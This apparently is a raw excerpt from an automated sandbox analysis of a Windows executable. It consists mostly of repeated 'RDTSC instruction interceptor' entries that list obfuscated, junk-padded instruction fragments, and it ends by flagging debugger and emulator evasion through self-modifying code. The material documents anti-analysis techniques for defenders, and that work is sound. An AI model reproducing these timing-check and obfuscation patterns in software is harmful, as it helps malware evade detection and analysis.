Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77601C4 second address: 77601DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F474CE39604h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77601DC second address: 7760210 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+24h], 00000000h 0x00000010 jmp 00007F474D527177h 0x00000015 lock bts dword ptr [edi], 00000000h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f push edx 0x00000020 pop eax 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 7760210 second address: 7760236 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, esi 0x00000005 mov si, 550Bh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007F47BCD1B80Dh 0x00000012 jmp 00007F474CE395FEh 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 7760236 second address: 776023D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 776023D second address: 776031D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 28h 0x00000005 pushfd 0x00000006 jmp 00007F474CE39607h 0x0000000b sub cx, 0C8Eh 0x00000010 jmp 00007F474CE39609h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pop esi 0x0000001a pushad 0x0000001b mov dh, al 0x0000001d pushfd 0x0000001e jmp 00007F474CE39609h 0x00000023 add ch, 00000076h 0x00000026 jmp 00007F474CE39601h 0x0000002b popfd 0x0000002c popad 0x0000002d pop ebx 0x0000002e pushad 0x0000002f call 00007F474CE395FCh 0x00000034 mov cx, CCF1h 0x00000038 pop esi 0x00000039 pushfd 0x0000003a jmp 00007F474CE39607h 0x0000003f and ax, 255Eh 0x00000044 jmp 00007F474CE39609h 0x00000049 popfd 0x0000004a popad 0x0000004b mov esp, ebp 0x0000004d jmp 00007F474CE395FEh 0x00000052 pop ebp 0x00000053 pushad 0x00000054 call 00007F474CE395FEh 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 7780821 second address: 7780834 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474D52716Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 7780834 second address: 778087B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474CE39609h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F474CE395FEh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov bh, C5h 0x00000013 movzx eax, di 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F474CE39600h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 778087B second address: 77808B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474D52716Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F474D52716Bh 0x00000014 jmp 00007F474D527173h 0x00000019 popfd 0x0000001a mov ebx, ecx 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77808B2 second address: 77808B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77808B8 second address: 77808D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F474D527176h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77808D9 second address: 77808DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77904A3 second address: 77904A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77904A8 second address: 77904B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77904B9 second address: 77904D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474D527177h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77904D4 second address: 77904DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 7800A64 second address: 7800A92 instructions: 0x00000000 rdtsc 0x00000002 mov ah, 4Ah 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F474D527175h 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F474D52716Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 7800A92 second address: 7800AFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474CE39601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dl, byte ptr [ebp+14h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F474CE395FCh 0x00000013 add cl, 00000048h 0x00000016 jmp 00007F474CE395FBh 0x0000001b popfd 0x0000001c jmp 00007F474CE39608h 0x00000021 popad 0x00000022 mov eax, dword ptr [ebp+10h] 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F474CE39607h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 7800AFC second address: 7800B69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F474D52716Fh 0x00000009 sbb cl, FFFFFF9Eh 0x0000000c jmp 00007F474D527179h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F474D527170h 0x00000018 adc esi, 04408398h 0x0000001e jmp 00007F474D52716Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 and dl, 00000007h 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F474D527170h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 7800B69 second address: 7800B6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 7800B6D second address: 7800B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 7800B73 second address: 7800B84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F474CE395FDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 7800B84 second address: 7800BD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a pushad 0x0000000b mov ax, di 0x0000000e jmp 00007F474D52716Fh 0x00000013 popad 0x00000014 je 00007F47BD38C7B6h 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushfd 0x0000001e jmp 00007F474D527172h 0x00000023 adc esi, 3DD612B8h 0x00000029 jmp 00007F474D52716Bh 0x0000002e popfd 0x0000002f rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 7800BD0 second address: 7800C79 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F474CE39608h 0x00000008 or eax, 0B914D18h 0x0000000e jmp 00007F474CE395FBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 jmp 00007F474CE39606h 0x0000001c pushfd 0x0000001d jmp 00007F474CE39602h 0x00000022 xor si, 6EA8h 0x00000027 jmp 00007F474CE395FBh 0x0000002c popfd 0x0000002d popad 0x0000002e popad 0x0000002f sub ecx, ecx 0x00000031 pushad 0x00000032 mov bl, D1h 0x00000034 mov ax, 576Dh 0x00000038 popad 0x00000039 inc ecx 0x0000003a pushad 0x0000003b mov di, ax 0x0000003e pushfd 0x0000003f jmp 00007F474CE39602h 0x00000044 add esi, 55AF1C38h 0x0000004a jmp 00007F474CE395FBh 0x0000004f popfd 0x00000050 popad 0x00000051 shr eax, 1 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 7800C79 second address: 7800C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 7800C7D second address: 7800C81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 7800C81 second address: 7800C87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 7800C87 second address: 7800A64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474CE395FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F47BCC9EB32h 0x0000000e jne 00007F474CE395EDh 0x00000010 inc ecx 0x00000011 shr eax, 1 0x00000013 jne 00007F474CE395EDh 0x00000015 imul ecx, ecx, 03h 0x00000018 movzx eax, dl 0x0000001b cdq 0x0000001c sub ecx, 03h 0x0000001f call 00007F474CE49AEDh 0x00000024 cmp cl, 00000040h 0x00000027 jnc 00007F474CE39607h 0x00000029 cmp cl, 00000020h 0x0000002c jnc 00007F474CE395F8h 0x0000002e shld edx, eax, cl 0x00000031 shl eax, cl 0x00000033 ret 0x00000034 or edx, dword ptr [ebp+0Ch] 0x00000037 or eax, dword ptr [ebp+08h] 0x0000003a or edx, 80000000h 0x00000040 pop ebp 0x00000041 retn 0010h 0x00000044 push ebp 0x00000045 push 00000001h 0x00000047 push edx 0x00000048 push eax 0x00000049 call edi 0x0000004b mov edi, edi 0x0000004d jmp 00007F474CE39600h 0x00000052 xchg eax, ebp 0x00000053 jmp 00007F474CE39600h 0x00000058 push eax 0x00000059 pushad 0x0000005a jmp 00007F474CE39601h 0x0000005f push eax 0x00000060 push edx 0x00000061 mov ebx, eax 0x00000063 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77E0BE2 second address: 77E0C0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 2352h 0x00000007 mov cl, dl 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e mov ebx, 2D62E776h 0x00000013 call 00007F474D527177h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77F042D second address: 77F0433 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77F0433 second address: 77F0437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77F0437 second address: 77F049C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F474CE395FAh 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 mov eax, 6BB5D96Dh 0x00000016 pushfd 0x00000017 jmp 00007F474CE395FAh 0x0000001c and ax, 8B08h 0x00000021 jmp 00007F474CE395FBh 0x00000026 popfd 0x00000027 popad 0x00000028 xchg eax, ebx 0x00000029 pushad 0x0000002a mov edx, eax 0x0000002c pushfd 0x0000002d jmp 00007F474CE39600h 0x00000032 sbb esi, 31C92D68h 0x00000038 jmp 00007F474CE395FBh 0x0000003d popfd 0x0000003e popad 0x0000003f push eax 0x00000040 pushad 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77F049C second address: 77F04F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov ax, dx 0x00000008 popad 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F474D527179h 0x00000011 adc ch, 00000036h 0x00000014 jmp 00007F474D527171h 0x00000019 popfd 0x0000001a pushad 0x0000001b jmp 00007F474D52716Eh 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 popad 0x00000024 xchg eax, esi 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77F04F0 second address: 77F04F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77F04F4 second address: 77F04FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77F04FA second address: 77F04FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77F04FF second address: 77F054E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F474D52716Eh 0x0000000a adc ch, FFFFFFB8h 0x0000000d jmp 00007F474D52716Bh 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 jmp 00007F474D527179h 0x0000001c xchg eax, esi 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F474D52716Dh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77F054E second address: 77F058B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F474CE39607h 0x00000008 pop esi 0x00000009 movsx ebx, si 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov esi, dword ptr [ebp+08h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F474CE39607h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77F058B second address: 77F05C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474D527179h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ecx, ecx 0x0000000b jmp 00007F474D527177h 0x00000010 xchg eax, edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77F05C8 second address: 77F05CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77F05CC second address: 77F05D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77F05D2 second address: 77F05EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F474CE39609h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77F05EF second address: 77F061E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474D527171h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F474D527173h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77F061E second address: 77F0624 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77F0624 second address: 77F063C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F474D527172h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77F063C second address: 77F0738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, edi 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007F474CE395FDh 0x0000000f sub ch, FFFFFFA6h 0x00000012 jmp 00007F474CE39601h 0x00000017 popfd 0x00000018 pushfd 0x00000019 jmp 00007F474CE39600h 0x0000001e or ah, 00000048h 0x00000021 jmp 00007F474CE395FBh 0x00000026 popfd 0x00000027 popad 0x00000028 mov eax, 00000001h 0x0000002d jmp 00007F474CE39606h 0x00000032 lock cmpxchg dword ptr [esi], ecx 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007F474CE395FEh 0x0000003d adc cl, FFFFFFD8h 0x00000040 jmp 00007F474CE395FBh 0x00000045 popfd 0x00000046 call 00007F474CE39608h 0x0000004b pushfd 0x0000004c jmp 00007F474CE39602h 0x00000051 add cl, 00000068h 0x00000054 jmp 00007F474CE395FBh 0x00000059 popfd 0x0000005a pop esi 0x0000005b popad 0x0000005c mov ecx, eax 0x0000005e jmp 00007F474CE395FFh 0x00000063 cmp ecx, 01h 0x00000066 jmp 00007F474CE39606h 0x0000006b jne 00007F47BCC8B497h 0x00000071 push eax 0x00000072 push edx 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77F0738 second address: 77F0750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F474D527173h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77F0750 second address: 77F0784 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F474CE395FFh 0x00000009 and ax, B96Eh 0x0000000e jmp 00007F474CE39609h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77F0784 second address: 77F07C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop edi 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007F474D52716Ah 0x0000000f adc esi, 015A3CE8h 0x00000015 jmp 00007F474D52716Bh 0x0000001a popfd 0x0000001b pushad 0x0000001c jmp 00007F474D527176h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77F07C3 second address: 77F0838 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 mov dh, ah 0x0000000a pushfd 0x0000000b jmp 00007F474CE39609h 0x00000010 sbb si, 6466h 0x00000015 jmp 00007F474CE39601h 0x0000001a popfd 0x0000001b popad 0x0000001c pop ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 pushfd 0x00000023 jmp 00007F474CE39609h 0x00000028 and ecx, 476C7476h 0x0000002e jmp 00007F474CE39601h 0x00000033 popfd 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77F0838 second address: 77F08B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F474D527177h 0x00000009 and esi, 389D59AEh 0x0000000f jmp 00007F474D527179h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F474D527170h 0x0000001b adc ecx, 1C74FB28h 0x00000021 jmp 00007F474D52716Bh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a pop ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F474D527175h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77F08B1 second address: 77F08C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F474CE395FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77B0BBB second address: 77B0BC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77B0BC0 second address: 77B0C65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 push ecx 0x00000007 pop edi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F474CE39603h 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 mov bx, ax 0x00000016 mov bx, cx 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c jmp 00007F474CE395FAh 0x00000021 xchg eax, ecx 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F474CE395FEh 0x00000029 adc ax, 2278h 0x0000002e jmp 00007F474CE395FBh 0x00000033 popfd 0x00000034 call 00007F474CE39608h 0x00000039 call 00007F474CE39602h 0x0000003e pop eax 0x0000003f pop edi 0x00000040 popad 0x00000041 push eax 0x00000042 jmp 00007F474CE39601h 0x00000047 xchg eax, ecx 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F474CE395FDh 0x0000004f rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77B0C65 second address: 77B0C75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F474D52716Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77B0C75 second address: 77B0C9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F474CE39609h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77B0C9C second address: 77B0CB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474D527171h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77B0CB1 second address: 77B0CFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474CE39601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000000h 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F474CE395FCh 0x00000012 adc si, 3588h 0x00000017 jmp 00007F474CE395FBh 0x0000001c popfd 0x0000001d movzx eax, dx 0x00000020 popad 0x00000021 push dword ptr [ebp+08h] 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F474CE395FEh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77B0A97 second address: 77B0ACF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F474D527178h 0x00000009 sub eax, 39512518h 0x0000000f jmp 00007F474D52716Bh 0x00000014 popfd 0x00000015 mov ah, 54h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push esp 0x0000001b pushad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77B0ACF second address: 77B0B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop edx 0x00000006 popad 0x00000007 push ecx 0x00000008 push edi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b popad 0x0000000c mov dword ptr [esp], ebp 0x0000000f pushad 0x00000010 mov ebx, eax 0x00000012 mov ecx, 2A9D7A45h 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a jmp 00007F474CE39600h 0x0000001f mov eax, dword ptr [ebp+08h] 0x00000022 jmp 00007F474CE39600h 0x00000027 and dword ptr [eax], 00000000h 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d pushfd 0x0000002e jmp 00007F474CE395FCh 0x00000033 adc ch, 00000038h 0x00000036 jmp 00007F474CE395FBh 0x0000003b popfd 0x0000003c rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77B08AB second address: 77B08AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77B08AF second address: 77B08B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77B08B5 second address: 77B08CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F474D527171h 0x00000009 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeSpecial instruction interceptor: First address: 114B900 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeSpecial instruction interceptor: First address: 12E68F6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeSpecial instruction interceptor: First address: 1368CBA instructions caused by: Self-modifying code
